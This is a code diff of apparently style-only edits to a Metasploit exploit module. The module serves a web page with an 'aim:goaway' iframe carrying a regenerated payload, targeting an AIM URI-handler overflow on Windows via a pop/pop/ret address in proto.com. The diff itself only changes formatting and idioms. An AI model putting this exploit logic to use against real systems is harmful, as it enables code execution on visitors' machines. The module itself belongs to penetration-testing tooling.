@@ -39,9 +39,8 @@ class MetasploitModule < Msf::Exploit::Remote
           'Space' => 1014,
           'MaxNops' => 1014,
           'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
-          'StackAdjustment' => -3500,
+          'StackAdjustment' => -3500
         },
-        'Platform' => %w{win},
         'Targets' => [
           # Target 0: Automatic
           [
@@ -51,7 +50,7 @@ class MetasploitModule < Msf::Exploit::Remote
               'Rets' =>
                 [
                   0x1108118f, # proto.com: pop/pop/ret
-                ],
+                ]
             },
           ],
         ],
@@ -66,9 +65,9 @@ class MetasploitModule < Msf::Exploit::Remote
     )
   end
 
-  def on_request_uri(cli, request)
+  def on_request_uri(cli, _request)
     # Re-generate the payload
-    return if ((p = regenerate_payload(cli)) == nil)
+    return if ((p = regenerate_payload(cli)).nil?)
 
     # Build out the message
     msg =
@@ -80,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Remote
     # Build the HTML content
     content = "<html><iframe src='aim:goaway?message=#{msg}'></html>"
 
-    print_status("Sending #{self.name}")
+    print_status("Sending #{name}")
 
     # Transmit the response to the client
     send_response_html(cli, content)
